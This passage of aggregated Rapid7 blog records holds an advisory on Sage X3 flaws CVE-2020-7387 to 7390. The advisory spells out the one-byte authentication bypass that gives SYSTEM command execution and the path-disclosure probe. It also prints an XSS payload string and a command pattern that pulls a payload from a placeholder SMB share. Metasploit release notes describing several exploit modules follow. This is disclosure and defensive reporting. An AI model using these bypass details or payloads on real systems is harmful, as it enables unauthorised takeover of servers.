(Severity) | Remediation \n---|---|---|--- \nCVE-2020-7388 | [CWE-290](<http://cwe.mitre.org/data/definitions/290.html>): Unauthenticated Command Execution Bypass by Spoofing in AdxAdmin | [10.0](<http://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N&version=3.1>) (Critical) | [Update available](<http://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches>) \nCVE-2020-7387 | [CWE-200](<http://cwe.mitre.org/data/definitions/200.html>): Exposure of Sensitive Information to an Unauthorized Actor in AdxAdmin | [5.3](<http://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N&version=3.1>) (Medium) | [Update available](<http://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches>) \nCVE-2020-7389 | [CWE-306](<http://cwe.mitre.org/data/definitions/306.html>) Missing Authentication for Critical Function in Developer Environment in Syracuse | [5.5](<http://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N&version=3.1>) (Medium) | No fix planned, as this is a development function and not a production function. \nCVE-2020-7390 | [CWE-79](<http://cwe.mitre.org/data/definitions/79.html>): Persistent Cross-Site Scripting (XSS) in Syracuse | [4.6](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N&version=3.1>) (Medium) | [Update available](<http://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches>) (note, this affects V12 only, unlike the other issues which affects V9 and V11 as well) \n \n# Product description\n\nSage X3 is an Enterprise Resource Planning (ERP) application, and is primarily used for supply chain management in medium to large enterprises. The product is especially popular in British and other European markets. More information about Sage X3 can be found at the [vendor's website](<https://www.sage.com/en-gb/sage-business-cloud/sage-x3/>).\n\n## Credit\n\nThese issues were discovered by Rapid7 researchers Jonathan Peterson ([@deadjakk](<https://twitter.com/deadjakk>)_)_, Aaron Herndon ([@ac3lives](<https://twitter.com/ac3lives>)_)_, Cale Black, Ryan Villarreal ([@XjCrazy09](<https://twitter.com/XjCrazy09>)), and William Vu. They are being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\nCVE-2020-7390 was previously reported to the vendor by [Vivek Srivastav](<https://app.cobalt.io/vsrivastav>) from Cobalt Labs in January of 2021.\n\n# Exploitation\n\nFor each of the identified vulnerabilities, what follows is a brief description of the issue and exploitation techniques that leverage it:\n\n## CVE-2020-7388: Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component\n\nSage X3 exposes an administrative service on port TCP/1818 (default, but changeable) under the process \"AdxDSrv.exe,\" part of the AdxAdmin component. This service is used for remote administration of the Sage ERP solution through the Sage X3 Console. A vulnerability within the service allows a malicious actor to craft a request to the exposed service to execute commands on the server as the \"NT AUTHORITY/SYSTEM\" user.\n\n### AdxDSrv.exe Authentication and Execution Process\n\nSage X3 uses a custom protocol for interaction between the Sage X3 Console thick client and AdxDSrv.exe. Reviewing the protocol, the Sage X3 console crafts a request to authenticate using a byte sequence as follows:\n \n \n 0x6a + length of message + length of username + username + length of username + username + \\x1cCRYPT: + encryptedpassword\n \n\nSage X3 uses a custom encryption mechanism to encrypt the password, but for the sake of brevity, we will not go into the encryption method here. An example message can be seen below, sending the user \"admin\" with password \"password\":\n\n`\\x6a'\\x05admin\\x05admin\\x1aCRYPT:tzksgrQeseSccrftgrqk`\n\nIn response, the AdxDSrv.exe sends 4 bytes indicating that authentication was successful. These bytes are always prefixed with \\x00\\x00 and then two apparently random bytes, like so:\n\n`\\x00\\x00\\x08\\x14`\n\nAfter receiving this successful authentication response, a message can be sent to execute remote commands. First, the temporary directory is specified by the client with the name of the \"cmd\" file to be written to the server. \n\nAs seen in the image below, the batch file, with the provided \"cmd\" file name, is written to disk with the \"whoami\" command in it:\n\n![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://lh5.googleusercontent.com/Fx_V8wmYwXHL_hVI0mxygKSnk9ZuQ23GLtL_C-QZTz9ENyRe56tv5OjTX9CAnIVT48EJ6ufxKIHiigfh5grniN_AI0BzOGAba_yQtGiVe57VNKEojY_ErXT4eYkZ029pRrvsbSpB)\n\nAfter the AdxDSrv.exe service writes the temporary batch file to the named folder, it will execute it under the security context of the provided user credentials, via a Windows API call to CreateProcessAsUserAs. This can be observed within Windows Event Logs as a Windows Event Logon with `CreateProcess(AsUser)`. Below is an example of the sequence of messages that ultimately result in the command being written to a file, executed, and then reading of the output: \n\n\n![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://lh3.googleusercontent.com/PgGAgI3Lg2aUedfAOh33KYlR3f5pYrOhaoQdkBotxtoa_2KMblwnUuyou094KL4Ni4Vi3L3GpDGYc9k_kQj61dIcWRwTtjsn31AiOEjXiTXXa5BegObQVgPcsyhADYZ-CfagRUbr)\n\nBelow is the snippet of code that calls CreateProcessAsUserA with the provided user credentials within AdxSrv.exe, a thread spawned from AdxDSrv.exe:\n\n![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://lh5.googleusercontent.com/bL3OjI-oBTXD0y2bg1kdDf4oqsCLC0W5u6fl1cyWmZMP43gO_v30nwNs13ozZYzG7x8aywMS6Hhg46JH2up1vfM73tTUV394oLvW8zV3BFey2TcaY6CakfyB0DerYqWENWusp2yi)\n\n### Executing Without Valid Authentication, as NT AUTHORITY\\SYSTEM\n\nSending commands to execute requires two components. The first is knowing the installation directory of the AdxAdmin service so that we can provide the service the full path location to which to write the \".cmd\" file to be executed. The second component is the \"authorization sequence,\" which, as shown above, involves sending a username and password encrypted with the encryption protocol used by the AdxDSrv.exe service for the .cmd file to be executed via a Windows API call to CreateProcessAsUserA.\n\nObtaining the installation\u2019s directory can be done either with prior knowledge, educated guesswork, or via an unauthenticated, remote information disclosure vulnerability outlined below as CVE-2020-7387.\n\nThe second step can be sidestepped with a series of packets that recreate the AdxDSrv.exe authentication and command protocol, but with one critical modification: An attacker can simply swap one byte and cause the service to ignore provided user credentials, and instead execute under the current AdxDSrv.exe process security context, which runs as NT AUTHORITY\\SYSTEM. A bit of fuzzing revealed that using \"0x06\" instead of \"0x6a\" during the start of the authorization sequence allows for the sequence to continue and the command to instead run as the NT AUTHORITY\\SYSTEM account.\n\nIn other words, the client appears to be able to opt out of authentication entirely. In this mode, the requested command is executed as SYSTEM instead of impersonating a provided user account.\n\nThe image below shows a proof-of-concept exploit in action, sending the entire sequence to execute \"whoami\" without having ever provided the encrypted user credentials as was previously required.\n\n![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://lh3.googleusercontent.com/lSxGgZIsgZHtDs6eNqQrJWrxaATDf44zBIq2CATlSsOsosGePQ8N-0PVy70rzbAUNahkq1CbsjAR8K8qTU-2bAMKDSjRmHVwreR3PmBeH-U6t0K5OGHsrg8BY9sHd0XNJQkGgDn2)\n\nThe issue was fixed in AdxAdmin version 93.2.53, which is common to X3 V9, V11, and V12, and ships with Syracuse 9.22.7.2, 11.25.2.6, and 12.10.2.8, respectively.\n\n## CVE-2020-7387: Sage X3 Installation Pathname Disclosure\n\nWhile fuzzing the authentication and command protocol used by AdxAdmin.exe as described in CVE-2020-7388, it was discovered that sending the first byte as \"0x09\" rather than \"0x6a\", with three trailing null bytes, returned the installation directory without requiring any authentication.\n\nThe image below shows an example of the message being sent, along with the response from the server containing the directory path information:\n\n![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://lh5.googleusercontent.com/YgJpQs3dULnesCp0GtpBQ36Q-wBLdLMg6zNvKKgb0T9tF9MD_2Vtlj0MqDPpiRkwkQC3-v7VCR7blrXfzLCx7EQPf4KI8AkT6SjBy5gZ4YP7sH6L8NRQQuI704cbMi6vxIIWU64D)\n\nWhile installation path names tend to be fairly predictable when it comes to most enterprise software\u2014nearly all users install to a default directory on one of a handful of drive letters\u2014this vulnerability does give an attacker information required to exploit CVE-2020-7388, above.\n\n## CVE-2020-7389: System CHAINE Variable Script Command Injection\n\nSome web application scripts that allowed the use of the 'System' function could be paired with the 'CHAINE' variable in order to execute arbitrary commands, including those sourced from a remote SMB share. The page can be reached via the menu prompts _Development -> Script dictionary -> Scripts_. Note that, according to the vendor, this functionality should only be available in development environments, and not production environments.\n\nIn the below example, the vulnerability command pattern `System CHAINE=\"\\\\\\<SMB Server>\\<Share>\\<Payload>\"` is demonstrated:\n\n![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://lh5.googleusercontent.com/BR0-8ApOdY4NbkuIX3cA31Ex6QesWAAdLBL0SD0dG4QIIp_dKeA3WoEsyT9z0Ji9_SNgHmYb4Yu5nlyQSJVbhkf_kAhwZJvzs78BjjuZXPKWs8it59FvGsgYZrHW_DmvKgTZ8hW_)\n\nThe screenshot below demonstrates an Impacket SMB server that offers \"a.bat\", which in turn calls \"b.exe,\" and the resultant attempt to connect and evaluate the payload specified in CHAINE variable:\n\n![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://lh6.googleusercontent.com/RWoAnAch6XxYyH08iCQEZpFoneVjGIKm7Ravk8RW1dzVfHDILQ6SVlnFfm3nbVOXpQqj5I_hsiFbI9H5EKInMCfgSD1lBBSMTxm3ViusVQM9jo63CDZVDjnTAAyvbkFvH5A1bZme)\n\n## CVE-2020-7390: Stored XSS Vulnerability on \u2018Edit\u2019 Page of User Profile\n\nThe \u2018First name\u2019, \u2018Last name\u2019, and \u2018Email\u2019 fields within the \u2018Edit User\u2019 page is vulnerable to a stored XSS sequence. An example XSS string, `test<img src=x onerror=(alert('xss'))>></x>\"></plaintext\\></|\\>`, is executed upon a `mouseOver` Javascript event, as demonstrated below:\n\n![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://lh3.googleusercontent.com/jIBqFSYtL8OAEd_rUrQCaP5qSrHXVfMqKu7EeaQKeZ6ZxtuRx8aUX9CJRoTSTx-VqGT5jLIm7WktEC97HAKYz7dV3GOJ-E9AhqVLjIiQmjjYBGAQi6pFrTyIqqoM-jEuPG5OXbzO)\n\n# Impact\n\nWhen combining CVE-2020-7387 and CVE-2020-7388, an attacker can first learn the installation path of the affected software, then use that information to pass commands to the host system to be run in the SYSTEM context. This can allow an attacker to run arbitrary operating system commands to create Administrator level users, install malicious software, and otherwise take complete control of the system for any purpose.\n\nCVE-2020-7389 describes a mechanism to subvert the development environment for Sage X3, and ultimately run OS commands as the \"x3run\" user. However, this functionality is a) restricted to authenticated users of Sage X3, and b) should not be exposed in production environments.\n\nFinally, CVE-2020-7390 describes a persistent cross-site scripting vulnerability, which can only be triggered by an authenticated user, and requires user interaction in order to complete the attack. If successful, however, this vulnerability could allow a regular user of Sage X3 to execute privileged functions as a currently logged-in administrator or capture administrator session cookies for later impersonation as a currently-logged-in administrator. Note that unlike the other issues, this issue is present only in unpatched Version 12 instances of Sage X3 (and not Version 9 or Version 10).\n\n# Vendor Statement\n\n_Sage takes the security of its customer solutions extremely seriously, and regularly undertakes proactive testing across its products to identify potential vulnerabilities and provide fixes. We are grateful to Rapid7, who recently made Sage aware of a vulnerability in our on-premise Sage X3 product. Sage and its Partners have issued a fix for the vulnerability, contacted all applicable customers and advised them on the onward process \u2013 more information can be_[_ _found here](<https://www.sagecity.com/support_communities/sage_erp_x3/f/sage-x3-announcements-news-and-alerts/169216/sage-x3-product-fix-for-security-vulnerability-has-been-posted-to-kb-110640>)_ \u2013 with information on Sage X3 security best practices_[_ _here](<https://www.sagecity.com/support_communities/sage_erp_x3/f/sage-x3-announcements-news-and-alerts/169216/sage-x3-product-fix-for-security-vulnerability-has-been-posted-to-kb-110640>).\n\n# Remediation\n\nThe most recent on-premises versions of Sage X3 Version 9, Version 11, and Version 12 address these issues, and users of Sage X3 are urged to update their Sage infrastructure at their earliest convenience. In the event updates cannot be applied immediately, customers should consider the following remediation efforts:\n\n * For CVE-2020-7388 and CVE-2020-7387, do not expose the AdxDSrv.exe TCP port on any host running Sage X3 to the internet or other untrusted networks. As a further preventative measure, the adxadmin service should be stopped entirely while in production.\n * For CVE-2020-7389, generally speaking, users should not expose this webapp interface to the internet or other untrusted networks. Furthermore, users of Sage X3 should ensure that development functionality is not available in production environments. For more information on ensuring this, please refer to [the vendor's Best Practices documentation](<https://online-help.sageerpx3.com/erp/12/public/getting-started_security-best-practices.html#Development>).\n * In the event that network segmentation is inconvenient due to business critical functions, only users trusted with system administration of the machines that host Sage X3 should be granted login access to the web application.\n\n# Disclosure Timeline\n\n * Dec 2020: Issues discovered by the above-named Rapid7 researchers.\n * Feb 3, 2021: Initial disclosure to the vendor, Sage\n * __Feb 4, 2021: Details provided to the vendor.__\n * Feb 22, 2021: Complete writeups of the findings provided to the vendor\n * Mar 25, 2021: Sage [released updates](<https://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/148233/sage-x3-version-11-march-2021>) for affected components\n * May 18, 2021: Sage begins targeted, private customer disclosure\n * Jun 14, 2021: Finalized vulnerability descriptions in cooperation with the vendor\n * Jul 7, 2021: Public Disclosure of CVE-2020-7387..7390.", "cvss3": {}, "published": "2021-07-07T13:05:00", "type": "rapid7blog", "title": "CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388", "CVE-2020-7389", "CVE-2020-7390"], "modified": "2021-07-07T13:05:00", "id": "RAPID7BLOG:7E8AECF6144050DEA823EEFC18D04C57", "href": "https://blog.rapid7.com/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-28T14:56:11", "description": "![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/07/metasploit-ascii-1-2.png)\n\n## Now I Control Your Resource Planning Servers\n\nSage X3 is a resource planning product designed by Sage Group which is designed to help established businesses plan out their business operations. But what if you wanted to do more than just manage resources? What if you wanted to hijack the resource server itself? Well wait no more, as thanks to the work of [Aaron Herndon](<https://www.linkedin.com/in/aaron-herndon-54079b5a/>), [Jonathan Peterson](<https://www.linkedin.com/in/jonathan-p-004b76a1/>), [William Vu](<https://twitter.com/wvuuuuuuuuuuuuu>), [Cale Black](<https://github.com/cblack-r7>), and [Ryan Villarreal](<https://www.linkedin.com/in/ryanvillarreal/>) along with work from community contributor [deadjakk](<https://github.com/deadjakk>), Metasploit now has an exploit module for [CVE-2020-7388](<https://attackerkb.com/topics/q0ETmshZPW/cve-2020-7388?referrer=blog>) and [CVE-2020-7387](<https://attackerkb.com/topics/l1RZYyWf4X/cve-2020-7387?referrer=blog>), to allow unauthenticated attackers to gain `SYSTEM` level code execution on affected versions of Sage X3. This module should prove very useful on engagements both as a way to gain an initial foothold in a target network, as well as a way to elevate privileges to allow for more effective pivoting throughout the target network. More information on these vulnerabilities can be found in our detailed writeup post [on our blog](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/?referrer=blog>).\n\n## Help My Server is Raining Keys\n\nAnother great module that landed this week was an exploit for [CVE-2021-27850](<https://attackerkb.com/topics/32H1tJnyGT/cve-2021-27850?referrer=blog>) from [Johannes Mortiz](<https://www.radicallyopensecurity.com/our-team/pentester/JohannesMoritz.html>) and Yann Castel aka [Hakyac](<https://github.com/Hakyac>), which allows attackers to steal the HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. This HMAC key is particularly important in many applications as it is often used to sign important data within the application. However in the case of Apache Tapestry, one can actually take this even further and use the leaked HMAC key to exploit a separate Java deserialization vulnerability in Apache Tapestry to gain RCE using readily available gadgets such as CommonBeansUtil1 from ysoserial. Therefore this should be one to keep an eye out for and patch if you haven't already.\n\n## PrintNightmare Improvements\n\nImprovements have been made to the PrintNightmare module thanks to [Spencer McIntyre](<https://twitter.com/zerosteiner>) to improve the way that Metasploit checks if a target is vulnerable or not, as well as to incorporate the `\\??\\UNC\\` bypass for the second and most recent patch at the time of writing. Additionally, a separate bug was fixed in Metasploit's DCERPC library to prevent crashes when handling fragmented responses from the target server that could not fit into a single packet. These fixes should help ensure that not only is Metasploit able to better detect servers that are vulnerable to PrintNightmare, but also help target those servers that may not have fully applied all the appropriate patches and mitigations.\n\n## New module content (4)\n\n * [Apache Tapestry HMAC secret key leak](<https://github.com/rapid7/metasploit-framework/pull/15211>) by Johannes Moritz and [Hakyac](<https://github.com/Hakyac>), which exploits [CVE-2021-27850](<https://attackerkb.com/topics/32H1tJnyGT/cve-2021-27850?referrer=blog>) \\- This adds an auxiliary module that retrieves the secret HMAC key from applications that use a vulnerable version of the Apache Tapestry web framework. Retrieving this key will allow an attacker to sign objects in order to exploit a separate Java deserialization vulnerability in Apache Tapestry.\n * [Sage X3 AdxAdmin Login Scanner](<https://github.com/rapid7/metasploit-framework/pull/15400>) by [Jonathan Peterson](<https://www.linkedin.com/in/jonathan-p-004b76a1/>) \\- Added a Sage X3 login scanner.\n * [Wordpress Plugin Backup Guard - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15402>) by Nguyen Van Khanh, [Ron Jost](<https://github.com/Hacker5preme>), and [Hakyac](<https://github.com/Hakyac>), which exploits [CVE-2021-24155](<https://attackerkb.com/topics/ufEsuA2DpJ/cve-2021-24155?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin, Backup Guard. For versions below `v1.6.0`, the plugin permits the upload of arbitrary php code due to insufficient checks on the file format. Once the file is uploaded, code execution can be achieved by requesting the file, located under the `/wp-content/uploads/backup-guard` directory.\n * [Sage X3 Administration Service Authentication Bypass Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15400>) by [Aaron Herndon](<https://www.linkedin.com/in/aaron-herndon-54079b5a/>) and [Jonathan Peterson](<https://www.linkedin.com/in/jonathan-p-004b76a1/>), which exploits [CVE-2020-7388](<https://attackerkb.com/topics/q0ETmshZPW/cve-2020-7388?referrer=blog>)\\- Added an exploit for [CVE-2020-7387 + CVE-2020-7388](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>).\n\n## Enhancements and features\n\n * [#15403](<https://github.com/rapid7/metasploit-framework/pull/15403>) from [pingport80](<https://github.com/pingport80>) \\- This makes changes to the Powershell session type to report its platform using a value consistent with the other session types. It also adds Powershell session support to some methods within the file mixin.\n * [#15409](<https://github.com/rapid7/metasploit-framework/pull/15409>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- An update has been made to the PrintNightmare module to improve the way that it checks if a target is vulnerable or not and to now automatically converts UNC paths to use the `\\??\\UNC\\host\\path\\to\\dll` format to bypass the second and most recent patch at the time of writing. Additionally a bug was fixed in the DCERPC library where data that was read would be incomplete when the response would not fit into a single fragment to ensure that the PrintNightmare module can now read long responses from the target such as when enumerating the installed printer drivers.\n * [#15440](<https://github.com/rapid7/metasploit-framework/pull/15440>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490\n\n## Bugs fixed\n\n * [#14683](<https://github.com/rapid7/metasploit-framework/pull/14683>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This replaces a cryptic exception raised by msfvenom when an incompatible EXE template file is used with a specific injection technique. The new exception validates whether the EXE is compatible and reports the reason it is not so the user can more easily understand the problem.\n * [#15436](<https://github.com/rapid7/metasploit-framework/pull/15436>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- Ensure that generated variable names aren't Java keywords\n * [#15443](<https://github.com/rapid7/metasploit-framework/pull/15443>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds python3 support for the wmiexec external module `auxiliary/scanner/smb/impacket/wmiexec`\n * [#15445](<https://github.com/rapid7/metasploit-framework/pull/15445>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Updates msfconsole's output logs to only show the target's ip when an exploit module is run, rather than a host-hash\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.53...6.0.54](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-15T10%3A18%3A50%2B01%3A00..2021-07-22T11%3A58%3A03-05%3A00%22>)\n * [Full diff 6.0.53...6.0.54](<https://github.com/rapid7/metasploit-framework/compare/6.0.53...6.0.54>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-23T19:39:14", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388", "CVE-2021-24155", "CVE-2021-27850"], "modified": "2021-07-23T19:39:14", "id": "RAPID7BLOG:5D64EF678F668492563D94414E31C3D2", "href": "https://blog.rapid7.com/2021/07/23/metasploit-wrap-up-122/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-09T18:55:38", "description": "## PrintNightmare\n\n![Metasploit Wrap-up](https://blog.rapid7.com/content/images/2021/07/metasploit-blg-2-small-1.png)\n\nRapid7 security researchers [Christophe De La Fuente](<https://github.com/cdelafuente-r7>), and [Spencer McIntyre](<https://github.com/zeroSteiner>), have added a new module for [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as `NT AUTHORITY\\SYSTEM`.\n\nBecause Metasploit's SMB server doesn't support SMB3 (yet), it's highly recommended to use an external SMB server like Samba that supports SMB3. The [Metasploit module documentation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md>) details the process of generating a payload DLL and using this module to load it.\n\n[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) is being actively exploited in the wild. For more information and a full timeline, see [Rapid7\u2019s blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)!\n\n## NSClient++\n\nGreat work by community contributor [Yann Castel](<https://github.com/Hakyac>) on their new NSClient++ module. This module allows an attacker with an unprivileged windows account to gain admin access on a windows system and start a shell.\n\nFor this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature should be enabled. You must also know where the NSClient config file is as it is used to read the admin password which is stored in clear text.\n\n## New module content (2)\n\n * [Print Spooler Remote DLL Injection](<https://github.com/rapid7/metasploit-framework/pull/15385>) by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) \\- A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the `SYSTEM` user.\n\n * [NSClient++ 0.5.2.35 - Privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/15318>) by BZYO, Yann Castel and kindredsec - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and ExternalScriptsfeature enabled, gains a SYSTEM shell.\n\n## Enhancements and features\n\n * [#15366](<https://github.com/rapid7/metasploit-framework/pull/15366>) from [pingport80](<https://github.com/pingport80>) \\- This updates how the msfconsole's history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).\n\n## Bugs fixed\n\n * [#15320](<https://github.com/rapid7/metasploit-framework/pull/15320>) from [agalway-r7](<https://github.com/agalway-r7>) \\- A bug has been fixed in the `read_file` method of `lib/msf/core/post/file.rb` that prevented PowerShell sessions from being able to use the `read_file()` method. PowerShell sessions should now be able to use this method to read files from the target system.\n * [#15371](<https://github.com/rapid7/metasploit-framework/pull/15371>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `apport_abrt_chroot_priv_esc` module where if the `apport-cli` binary was not in the PATH the check method would fail.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-30T14%3A00%3A49-05%3A00..2021-07-08T16%3A19%3A37%2B01%3A00%22>)\n * [Full diff 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/compare/6.0.51...6.0.52>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the\n\n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-07-09T17:53:41", "type": "rapid7blog", "title": "Metasploit Wrap-up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-09T17:53:41", "id": "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "href": "https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:04:19", "description": "![Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors](https://blog.rapid7.com/content/images/2022/01/rapid7-2021-wrapup.jpg)\n\nNow that 2022 is fully underway, it's time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization's infrastructure secure \u2014 even in the face of [some of the most difficult threats](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) the security community has dealt with in recent memory. Here's a rundown of some of our biggest moments in that effort from 2021.\n\n## Emergent threats and vulnerability disclosures\n\nAs always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let's revisit some of the highlights.\n\n### Emergent threat reports\n\n * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)\n * [CVE-2021-34527 (PrintNightmare): What You Need to Know](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\n * [GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](<https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n * [Microsoft SAM File Readability CVE-2021-36934: What You Need to Know](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>)\n\n### Vulnerability disclosures\n\n * [CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)](<https://www.rapid7.com/blog/post/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/>)\n * [Fortinet FortiWeb OS Command Injection](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * 